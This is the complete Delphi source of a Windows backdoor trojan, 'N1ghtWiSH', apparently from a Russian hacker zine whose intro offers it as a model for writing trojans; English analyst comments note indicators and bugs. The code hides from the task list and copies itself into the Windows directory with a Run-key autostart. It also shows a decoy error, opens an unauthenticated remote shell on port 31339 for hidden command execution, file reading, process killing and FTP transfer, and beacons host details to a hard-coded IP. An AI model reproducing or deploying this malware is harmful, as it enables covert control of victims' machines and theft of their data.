----------------------------------------------
#!/usr/share/doc/defaced/3/tandp/nightwish.txt
----------------------------------------------
[ N1ghtWiSH project ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ by defaced staff ]
B14cKh47z fUck1n s7uFf - WTF???
Вы спросите, что это за херня? это был закрытый релиз ZUDteam =)) Короче, вот
исходник трояна для windoz. Тут есть несколько интересных техник, которые могут
помочь при написании троя. Стоит сказать, что код _не_ оптимизирован, тут есть
много лишнего, но это не важно. Цель - показать идею.
---------------------------------// N1ghtWiSH.dpr
program N1ghtWiSH;
// Analyst note: entry point of the N1ghtWiSH backdoor (ZUDteam release, per the header above).
// The main form is created but never shown; all install, listener and beacon logic lives in main.pas.
uses
Forms, Registry,
main in 'main.pas' {Form1};
// RegisterServiceProcess is a Win9x-only kernel32 export: registering the current process as a
// "service" keeps it out of the Close Program (Ctrl+Alt+Del) list. The import is declared with no
// parameters on purpose - the arguments are pushed by hand in the asm block below.
procedure hidenow; external 'kernel32.dll' name 'RegisterServiceProcess';
{$R *.res}
var
VerReg: TRegistry;
winver: string;
begin
Application.Initialize;
Application.ShowMainForm:=false; // the form stays hidden - no visible window at any point
Application.CreateForm(TForm1, Form1); // TForm1.FormCreate performs the install/persistence work
VerReg:=TRegistry.Create;
VerReg.RootKey:=$80000002; // $80000002 = HKEY_LOCAL_MACHINE (main.pas uses the symbolic constant)
VerReg.OpenKey('\Software\Microsoft\Windows\CurrentVersion',false);
winver:=VerReg.ReadString('Version'); // OpenKey result is not checked; an empty string simply skips the hide
if winver = 'Windows 98' then
begin
try
asm // I don't know exactly in which Windows versions besides
push 1 // 98 register_service_process() works.
push 0 // Hence this hassle...
call hidenow; // stdcall order (last argument first): this is RegisterServiceProcess(0, 1) - 0 = current process, 1 = register
end;
except
end; // any failure of the hide attempt is silently swallowed
end;
VerReg.CloseKey; // the TRegistry object itself is never freed
Application.Run;
end.
// _EOF_ N1ghtWiSH.dpr
---------------------------------// main.pas
unit main;
interface
// тут много лишнего vvvv
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Sockets, ExtCtrls, NMsmtp, ScktComp, StdCtrls,
ComCtrls, FileCtrl, NMFtp, IdBaseComponent, IdComponent, IdTCPConnection,
IdTCPClient, Psock, Registry,ShellAPI, IdRawBase, IdRawClient,
IdIcmpClient;
type
// Analyst note: the hidden main form hosts every component the backdoor uses. Component
// properties are partly set in the .dfm (not shown here) and partly in FormCreate.
TForm1 = class(TForm)
Watcher: TTimer; // periodic tick: one-shot HTTP beacon plus online-time counter (see WatcherTimer)
SNIF: TTcpServer; // command listener; bound to local port 31339 in FormCreate
FList: TFileListBox; // used by the 'dir' command to enumerate a directory
FTP: TNMFTP; // FTP client for 'ftpput'/'ftpget'; credentials come from conffile
CLIENT: TTcpClient; // outbound client used for the beacon POST in WatcherTimer
conffile: TListBox; // in-memory config: [0]=ftp host, [1]=login, [2]=password, [3]=codename; persisted as winass.dll
CheckBox1: TCheckBox; // when checked, 'process-list' also reports invisible and owned windows
procedure FormCreate(Sender: TObject); // first-run install/persistence, then start listener and timer
procedure SNIFAccept(Sender: TObject; ClientSocket: TCustomIpClient); // per-connection command shell (no authentication)
procedure WatcherTimer(Sender: TObject); // beacon and uptime bookkeeping
private
//
public
procedure KillProc(ClassName: PChar; WindowTitle: PChar); // FindWindow -> OpenProcess -> TerminateProcess
end;
var
Form1: TForm1;
// Analyst note: unit-level state shared by the form's event handlers.
// statstr  - 'null' until the beacon has been attempted, then '31337'; reset to 'null' when the local address is 127.0.0.1
// oldip, newip, autoruner - declared but not referenced anywhere in this unit
// winddir  - %SystemRoot% as read from HKLM\...\CurrentVersion\SystemRoot; directory the dropped files are written to
// codename - per-host identifier (hostname + random number) generated on first run and stored in conffile[3]
statstr,oldip,newip,winddir, autoruner, codename: string;
ReG: TRegistry; // created in FormCreate and created again in 'DIE-nahui' (the first instance is never freed)
onlineTime: integer; // incremented by 10 per timer tick once online; 'system-info' formats it as seconds (h:mm:ss)
implementation
{$R *.dfm}
// Analyst note: first-run installer plus normal startup. Runs once when the hidden form is created.
// "Installed" means both %SystemRoot%\winass.dll (config) and %SystemRoot%\mstask666.exe (copy of self) exist.
// Host indicators on this path: the two file names above, the HKLM\...\CurrentVersion\Run value 'mstask666',
// the decoy 'Sorry, but some wrong!' message box, and a listener on TCP 31339.
procedure TForm1.FormCreate(Sender: TObject);
begin
onlineTime:=0;
ReG:=TRegistry.Create;
ReG.RootKey:=HKEY_LOCAL_MACHINE;
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion',false);
winddir:=ReG.ReadString('SystemRoot'); // no check that OpenKey/ReadString succeeded
// Already installed -> load the saved config. Otherwise take the install branch.
if (FileExists(winddir+'\winass.dll')=true) and (FileExists(winddir+'\mstask666.exe')=true) then ConfFile.Items.LoadFromFile(winddir+'\winass.dll') else begin
// --- install branch: copy this executable into the Windows directory ...
CopyFile(Pchar(Application.ExeName),Pchar(winddir+'\mstask666.exe'),FALSE); // FALSE = overwrite if present
// ... and register it for autostart under HKLM\...\CurrentVersion\Run (value name 'mstask666').
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
Reg.WriteString('mstask666',winddir+'\mstask666.exe');
Chdir(winddir); // so the relative SaveToFile below lands in the Windows directory
Random(500); // results discarded and Randomize has not run yet: these two calls have no effect
Random(500);
// Default config. These index assignments require the list box to already hold 4 items (set in the .dfm, not visible here).
ConfFile.Items.Strings[0]:='ftp.somethere.ru'; // [0] FTP host (default in this release)
ConfFile.Items.Strings[1]:='LAMER'; // [1] FTP login
ConfFile.Items.Strings[2]:='LAMER'; // [2] FTP password
Randomize;
ConfFile.Items.Strings[3]:=SNIF.LocalHostName+IntToStr(Random(500)); // [3] codename = hostname + random 0..499
ConfFile.Items.SaveToFile('winass.dll'); // plain text despite the .dll name; written to winddir (current dir after Chdir)
fileSetAttr(winddir+'\mstask666.exe',faSysfile); // both dropped files get the system attribute
fileSetAttr(winddir+'\winass.dll',faSysfile);
Reg.CloseKey;
// Decoy error shown to the user by the original (non-installed) copy, which then asks to quit.
MessageBox(handle,'Sorry, but some wrong! Please, remove this file!','Error',MB_ICONWARNING);
Application.Terminate; // NOTE(review): Terminate only posts a quit request, so the lines below still execute once - confirm
end;
// Re-create the Run value if it has been removed (executed on every start, including the first).
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
if ReG.ValueExists('mstask666')= false then Reg.WriteString('mstask666',winddir+'\mstask666.exe');
reg.CloseKey;
statstr:='null'; // 'null' = beacon not yet sent (see WatcherTimer)
SNIF.LocalPort:='31339'; // PORT TO LISTEN
SNIF.Active:=true; // start accepting; every accepted client reaches SNIFAccept without authentication
FTP.Host:=ConfFile.Items.Strings[0];
FTP.UserID:=ConfFile.Items.Strings[1];
FTP.Password:=ConfFile.Items.Strings[2];
codename:=confFile.Items.Strings[3];
Watcher.Enabled:=true; // start the beacon/uptime timer
end;
// Analyst note: handler for every connection accepted on the SNIF listener (local port 31339).
// It sends a fixed greeting and then serves a line-oriented command shell for as long as the
// socket stays open. No credential or token is ever requested: any client that can reach the
// port gets the complete command set below. The greeting, the '?' menu and the prompt strings
// are stable content for network detection.
procedure TForm1.SNIFAccept(Sender: TObject;
ClientSocket: TCustomIpClient);
var
cmd,welc,comm, frem,floc,banner,onliner : string; // cmd = command word; comm = follow-up input; frem/floc = remote/local FTP paths
blank,ind1,ind2,ind3: integer; // blank = padding counter ('dir'); ind1/ind2 = loop indices; ind3 = FTP go/no-go flag
finder : TSearchRec; // shared by 'find' and 'findnext' within one session; FindClose is never called
Wnd : hWnd;
SysDate: TDateTime;
S: TStringList; // only assigned inside 'view' (see the note at S.Destroy)
buff: ARRAY [0..127] OF Char; // window-title buffer; longer titles are truncated
begin
banner:=SNIF.LocalHostName;
if SNIF.LocalHostName = '' then banner:= SNIF.LocalHostAddr;
ClientSocket.Sendln(' Welcome to N1ghtWiSH ('+banner+'), Master !'); // fixed greeting, sent before any input is read
welc := SNIF.LocalHostName+'> ';
while true do // no break/exit anywhere in the loop: the shell runs until the connection drops
begin
ClientSocket.Sendln('',#13#10);
ClientSocket.Sendln(welc,''); // prompt '<hostname>> '
cmd:=ClientSocket.Receiveln(#13#10); // one command word per line; matches below are exact and case-sensitive
if cmd <> '' then
begin
// '?': help menu. The '// ok' marks are the author's own implemented/tested markers.
if cmd = '?' then begin
ClientSocket.Sendln('ZUDteam N1ghtWiSH (Night Windows SHell =)',#13#10);
ClientSocket.Sendln('Nice to see you, Master!',#13#10);
ClientSocket.Sendln('',#13#10);
ClientSocket.Sendln('Commands:',#13#10);
ClientSocket.Sendln('system-info - View some info about system',#13#10); // ok
ClientSocket.Sendln('ftpput - Upload file to ftp-serv',#13#10); // ok
ClientSocket.Sendln('ftpget - Download file from ftp-serv',#13#10); // ok
ClientSocket.Sendln('dir - view dir list',#13#10); // ok
ClientSocket.Sendln('find - searching files',#13#10); // ok
ClientSocket.Sendln('findnext - resume searching files',#13#10);
ClientSocket.Sendln('view - file viewer',#13#10); // ok
ClientSocket.Sendln('exec - run any prog (you''l NOT see it!!!)',#13#10); // ok
ClientSocket.Sendln('windows-list - show list of all visible windows',#13#10);
ClientSocket.Sendln('process-list - show processes on machine ',#13#10); //ok
ClientSocket.Sendln('process-kill - kill process on machine ',#13#10);
ClientSocket.Sendln('windir - display windows directory',#13#10); //ok
ClientSocket.Sendln('viewconf - view current config',#13#10); // ok
ClientSocket.Sendln('editconf - set new config',#13#10); // ok
ClientSocket.Sendln('DIE-nahui - uninstall trojan',#13#10);
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'exec': runs a client-supplied command line through WinExec with SW_HIDE after a y/n confirmation.
// Output is not captured; the client only sees the prompts. The WinExec result is ignored.
else if cmd = 'exec' then
begin
ClientSocket.Sendln('YOU''L NOT SEE, WhAT GOING ON & USER CAN DETECT YOU!!! ',#13#10);
ClientSocket.Sendln('Are you sure (crazy;) ? [y/n] :','');
comm:=ClientSocket.Receiveln(#13#10);
if comm = 'y' then begin
ClientSocket.Sendln('Ok, enter command: ','');
comm:=ClientSocket.Receiveln(#13#10);
WinExec(Pchar(comm),SW_HIDE);
end
else ClientSocket.Sendln('exec aborted (yeah...)',#13#10);
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'windir': reports the Windows directory read from the registry in FormCreate.
else if cmd = 'windir' then begin
ClientSocket.Sendln('Windows dir: '+winddir,#13#10);
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'system-info': local date/time plus onlineTime formatted by hand as h:mm:ss.
else if cmd = 'system-info' then begin
ClientSocket.Sendln('---==[ SOME SYSTEM INFO ]==---',#13#10);
Sysdate:=Time; // NOTE(review): Time carries only the time-of-day, so the 'Date:' line likely shows the epoch date - confirm
ClientSocket.Sendln('',#13#10);
ClientSocket.Sendln('Date: '+DateToStr(SysDate),#13#10);
ClientSocket.Sendln('Time: '+TimeToStr(SysDate),#13#10);
// onlineTime is treated as seconds; only the literal '00:' prefixes provide zero-padding.
if onlineTime < 60 then onliner:='00:00:'+IntToStr(OnlineTime)
else if onlineTime< 3600 then begin
onliner:='00:'+IntToStr(OnlineTime div 60)+':'+IntTOStr(OnlineTime mod 60);
end
else begin
onliner:=IntTOStr(OnLineTime div 3600)+':'+IntTOStr((OnLineTime mod 3600) div 60)+':'+IntToStr((OnLineTime mod 3600) mod 60);
end;
ClientSocket.Sendln('Time ONLINE: '+onliner,#13#10);
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'dir': lists a directory through the TFileListBox, two names per line. A left-column name shorter
// than 30 chars is padded by sending single spaces one at a time; a longer one ends its line early.
else if cmd = 'dir' then begin
ClientSocket.Sendln('Enter path: ','');
comm:=ClientSocket.Receiveln(#13#10);
if DirectoryExists(comm)= false then ClientSocket.Sendln('dir ('+comm+') not exist',#13#10)
else begin
Flist.Directory:=comm;
if flist.Items.Count >0 then
begin
ind2:=0;
ClientSocket.Sendln('------------------------------[ Files here: '+IntTOStr(flist.Items.Count)+']--',#13#10);
while ind2 <= (flist.Items.Count-1) do // steps by two: entry ind2 goes left, entry ind2+1 goes right
begin
if StrLen(Pchar(flist.Items.Strings[ind2])) < 30 then begin
ClientSocket.Sendln(flist.items.Strings[ind2],'');
for blank:=0 to (30-StrLen(Pchar(flist.Items.Strings[ind2]))) do
begin
ClientSocket.Sendln(' ','');
end;
end
else begin
ClientSocket.Sendln(flist.items.Strings[ind2],#13#10); // long name: line ends here, ind2+1 is sent on the next line
end;
if (ind2+1)<=(flist.Items.Count-1) then ClientSocket.Sendln(flist.items.Strings[ind2+1]+' ',#13#10)
else ClientSocket.Sendln('',#13#10);
ind2 := ind2+2;
end;
end;
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'process-list': despite the name this walks top-level *windows* starting from the form's own handle
// and prints their titles - there is no process enumeration. CheckBox1 (state set at design time, not
// visible here) relaxes the visible/unowned filters.
else if cmd = 'process-list' then begin
Wnd := GetWindow(Handle, gw_HWndFirst);
ClientSocket.Sendln('-------------------------------------[ Process list: ]--',#13#10);
while Wnd <> 0 do
begin
IF //(Wnd <> Application.Handle) AND {-our own window}
(IsWindowVisible(Wnd)or checkbox1.checked) AND {-invisible windows}
((GetWindow(Wnd, gw_Owner) = 0)or checkbox1.checked) AND {-owned (child) windows}
(GetWindowText(Wnd, buff, sizeof(buff)) <> 0) {-windows without a title}
then begin
GetWindowText(Wnd, buff, sizeof(buff)); // fetched a second time; the condition above already filled buff
ClientSocket.Sendln(buff,#13#10);
end;
Wnd := GetWindow(Wnd, gw_hWndNext);
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'windows-list': the same walk as 'process-list' with the strict filters only (visible, unowned, titled).
else if cmd = 'windows-list' then begin
Wnd := GetWindow(Handle, gw_HWndFirst);
while Wnd <> 0 do
begin
if IsWindowVisible(Wnd) and
(GetWindow(Wnd, gw_Owner) = 0) and
(GetWindowText(Wnd, buff, sizeof(buff)) <> 0)
then begin
GetWindowText(Wnd, buff, sizeof(buff));
ClientSocket.Sendln((StrPas(buff)),#13#10);
end;
Wnd := GetWindow(Wnd, gw_hWndNext);
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'process-kill': terminates the process owning the top-level window with exactly this title (see KillProc).
else if cmd = 'process-kill' then begin
ClientSocket.Sendln('Window caption: ','');
comm:=ClientSocket.Receiveln(#13#10);
if comm <> '' then Form1.KillProc(nil,pchar(comm));
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'find' / 'findnext': FindFirst with attribute mask $3F (any file) on a client-supplied mask, one match
// per call. finder.Name is reset to 'None' after each print so a failed FindNext reports 'None'. The
// FindFirst/FindNext results are ignored, and 'findnext' before a successful 'find' uses an uninitialised
// TSearchRec.
else if cmd = 'find' then begin
ClientSocket.Sendln('Searchmask (i.e. "c:\Windoz\*.txt"): ','');
comm:=ClientSocket.Receiveln(#13#10);
FindFirst(comm,$0000003F,finder);
ClientSocket.Sendln(finder.Name,#13#10);
finder.Name:='None';
end
else if cmd = 'findnext' then begin
FindNext(finder);
ClientSocket.Sendln(finder.Name,#13#10);
finder.Name:='None';
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'view': sends any readable file back line by line (loaded as text via TStringList.LoadFromFile).
// Defect: S.Destroy at the end runs on every path, including the 'file not exists' branch where S was
// never created, so it operates on an uninitialised local.
else if cmd = 'view' then begin
ClientSocket.Sendln('File localion (i.e. c:\win\Suprpass.txt): ','');
comm:=ClientSocket.Receiveln(#13#10);
if FileExists(comm) = false then ClientSocket.Sendln(' file not exists',#13#10) else
begin
try
S:= TStringList.Create;
S.LoadFromFile(comm);
ClientSocket.Sendln('-----------------------------------------------[ Strings: '+IntToStr(S.Count)+']--',#13#10);
for ind1:= 0 to s.Count-1 do ClientSocket.Sendln(s.Strings[ind1],#13#10);
except
ClientSocket.Sendln('[!] Cant view!',#13#10);
end;
end;
S.Destroy; // see the note above: S is uninitialised on the not-exists path
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'ftpput': uploads a local file to the FTP server configured in conffile ([0] host, [1] login, [2] password).
// ind3 is the go/no-go flag; any exception collapses to '[!] Error !'. Disconnect is skipped on exceptions.
else if cmd = 'ftpput' then begin
ClientSocket.Sendln('--- FTP UTILITY v 1.00 ---',#13#10);
try
FTP.Connect;
ind3:=1;
ClientSocket.Sendln('Connected 2 ftp-serv ;) have PHUN!',#13#10);
ClientSocket.Sendln('Local File: ','');
floc := ClientSocket.Receiveln(#13#10);
ClientSocket.Sendln('Remote File: ','');
frem := ClientSocket.Receiveln(#13#10);
if (FileExists(floc) = false) then
begin
ClientSocket.Sendln('Local File not ExIST!',#13#10);
ind3:=0;
end;
if (ind3 = 1) then FTP.Upload(floc,frem);
FTP.Disconnect;
except
ClientSocket.Sendln('[!] Error !',#13#10);
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'ftpget': mirror of 'ftpput' (download to a local path); refuses to overwrite an existing local file.
else if cmd = 'ftpget' then begin
ClientSocket.Sendln('--- FTP UTILITY v 1.00 ---',#13#10);
try
FTP.Connect;
ind3:=1;
ClientSocket.Sendln('Connected 2 ftp-serv ;) have PHUN!',#13#10);
ClientSocket.Sendln('Remote File: ','');
frem := ClientSocket.Receiveln(#13#10);
ClientSocket.Sendln('Local File: ','');
floc := ClientSocket.Receiveln(#13#10);
if (FileExists(floc) = true) then
begin
ClientSocket.Sendln('tHis file already exists!',#13#10);
ind3:=0;
end;
if (ind3 = 1) then FTP.Download(frem,floc);
FTP.Disconnect;
except
ClientSocket.Sendln('[!] Error! ',#13#10);
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'viewconf': prints the codename and the FTP host/login/password in clear.
else if cmd = 'viewconf' then begin
ClientSocket.Sendln(' - Current N1ghtWiSH conf -',#13#10);
ClientSocket.Sendln('System codename: '+codename,#13#10);
ClientSocket.Sendln('Ftp-server: '+ConfFile.Items.Strings[0],#13#10);
ClientSocket.Sendln('Login: '+ConfFile.Items.Strings[1],#13#10);
ClientSocket.Sendln('Password: '+ConfFile.Items.Strings[2],#13#10);
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'DIE-nahui': "uninstall". After a fixed confirmation phrase it deletes the Run value only - mstask666.exe
// and winass.dll stay on disk and this process (with its listener) keeps running. A fresh TRegistry is
// created here, leaking the instance made in FormCreate. The final ShellExecute runs
// 'rundll32 user,disableoemlayer', a Win9x call reported to blank the display/hang the session - effect varies.
else if cmd = 'DIE-nahui' then begin
ClientSocket.Sendln(' -=DIE Haxyu`=- SELF-DESTROING MODE',#13#10);
ClientSocket.Sendln('ARE YOU SURE? Type "B-nu39y-BCE" for start uninstall : ','');
comm := ClientSocket.Receiveln(#13#10);
if comm <> 'B-nu39y-BCE' then ClientSocket.Sendln(' - DESTROING CANCELED!',#13#10) else begin
Reg:=TREgistry.Create;
ReG.RootKey:=HKEY_LOCAL_MACHINE;
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
if Reg.ValueExists('mstask666') = true then Reg.DeleteValue('mstask666') else ClientSocket.Sendln('Cannot uNinStall ! prog is not in registry',#13#10);
Reg.CloseKey;
ClientSocket.Sendln(' - SELF-DESTROING IS ENABLED !!!',#13#10);
ClientSocket.Sendln(' GOOD BYE, MASTER ! ;((( ',#13#10);
Sleep(1000);
try
ShellExecute(handle,'open','rundll32','user,disableoemlayer',nil,SW_SHOWNORMAL);
except
end;
end;
end
////////////////////////////////////////////////////////////////////////////////////////////////
// 'editconf': interactively replaces the FTP host/login/password in conffile and echoes them back.
// On 'y' the values are applied to the FTP component and winass.dll is rewritten in the Windows
// directory (chDir(winddir) first); on anything else the previous config is reloaded from that file.
// codename ([3]) is not editable here.
else if cmd = 'editconf' then begin
ClientSocket.Sendln(' - Seting new N1ghtWiSH conf -',#13#10);
ClientSocket.Sendln('Ftp-server: ','');
comm := ClientSocket.Receiveln(#13#10);
ConfFile.Items.Strings[0]:=comm;
ClientSocket.Sendln('Login: ','');
comm := ClientSocket.Receiveln(#13#10);
ConfFile.Items.Strings[1]:= comm;
ClientSocket.Sendln('Password: ','');
comm := ClientSocket.Receiveln(#13#10);
ConfFile.Items.Strings[2]:=comm;
ClientSocket.Sendln(' OK, Look at new setings: ',#13#10);
ClientSocket.Sendln('Ftp-server: '+ConfFile.Items.Strings[0],#13#10);
ClientSocket.Sendln('Login: '+ConfFile.Items.Strings[1],#13#10);
ClientSocket.Sendln('Password: '+ConfFile.Items.Strings[2],#13#10);
ClientSocket.Sendln('LOAD NEW SETTINGS? [y/n]: ','');
comm := ClientSocket.Receiveln(#13#10);
chDir(winddir);
if comm = 'y' then begin
FTP.Host:=ConfFile.Items.Strings[0];
FTP.UserID:=ConfFile.Items.Strings[1];
FTP.Password:=ConfFile.Items.Strings[2];
ConfFile.Items.SaveToFile('winass.dll');
end
else ConfFile.Items.LoadFromFile('winass.dll');
end
////////////////////////////////////////////////////////////////////////////////////////////////
else ClientSocket.Sendln('! Unknown command (try "?" to get some info)',#13#10);
end;
end;
end; // IFAccept END
// Analyst note: timer tick. Acts as a one-shot "online" beacon plus an uptime counter.
// statstr = 'null' means "not yet reported"; once the POST below has been attempted it becomes '31337'
// and later ticks only add 10 to onlineTime. When the local address is 127.0.0.1 (no network connection)
// statstr is reset so the beacon fires again the next time an address appears.
// The timer interval is set in the .dfm (not visible); the +10 suggests a 10 s interval - confirm.
procedure TForm1.WatcherTimer(Sender: TObject);
var
myip,hostnam,date,sendstr1: String;
curDate: TDateTime;
len: integer;
begin
if SNIF.LocalHostAddr <> '127.0.0.1' then begin
if statstr = 'null' then begin
statstr:='31337'; // marked as reported before the send is attempted: a failed POST is not retried while online
myip :=SNIF.LocalHostAddr;
curDate:=Time; // NOTE(review): Time carries only the time-of-day, so DateToStr below likely yields the epoch date - confirm
date := DateToStr(curDate)+' '+TimeToStr(curDate) ;
hostNam:=SNIF.LookupHostName(myip);
// Beacon body: local address, reverse-resolved hostname, per-host codename, timestamp, fixed os=win.
// None of the values are URL-encoded.
sendstr1 := 'action=add&addr='+myip+'&host='+hostnam+'&codename='+codename+'&time='+date+'&os=win';
len := StrLen(Pchar(sendstr1));
CLIENT.Active:=true; // activated before the destination is set
CLIENT.RemoteHost:='133.133.133.133'; // hard-coded collection endpoint (IP literal; the Host header below names a hostname)
CLIENT.RemotePort:='80';
try
if (CLIENT.Connect) = true then
begin
// Hand-written HTTP/1.1 POST. The misspelt media type ('x-www-url-formencoded' rather than
// 'x-www-form-urlencoded') and the fixed path/Host header are usable as network signatures.
CLIENT.Sendln('POST /cgi-bin/nightwish.cgi HTTP/1.1',#13#10);
CLIENT.Sendln('Host: statistics.hosting.net',#13#10);
CLIENT.Sendln('Content-Type: application/x-www-url-formencoded',#13#10);
CLIENT.Sendln('Content-Length: '+IntToStr(len),#13#10); // the body's trailing CRLF is not counted in len
CLIENT.Sendln('',#13#10);
CLIENT.Sendln(sendstr1,#13#10);
CLIENT.Disconnect; // the response is never read
end;
except
end; // connection/send errors are silently dropped
end else onlineTime:=onlinetime+10;; // the second ';' is an empty statement
end else
begin
statstr := 'null'; // offline: arm the beacon again
end;
end;
// Analyst note: terminates the process that owns a top-level window. Called from 'process-kill' with
// ClassName = nil, so matching is by exact window title only.
// No error handling: if FindWindow returns 0, ProcessID is left uninitialised and OpenProcess/TerminateProcess
// are still attempted with it. The process handle is never closed.
procedure TForm1.KillProc(ClassName: PChar; WindowTitle: PChar);
const
PROCESS_TERMINATE = $0001; // access right requested from OpenProcess
var
ProcessHandle : THandle;
ProcessID: Integer;
TheWindow : HWND;
begin
TheWindow := FindWindow(Classname, WindowTitle);
GetWindowThreadProcessID(TheWindow, @ProcessID); // return value (thread id) ignored
ProcessHandle := OpenProcess(PROCESS_TERMINATE, FALSE, ProcessId); // FALSE = handle not inheritable
TerminateProcess(ProcessHandle,4); // exit code 4; result not checked
end;
end.
// _EOF_ main.pas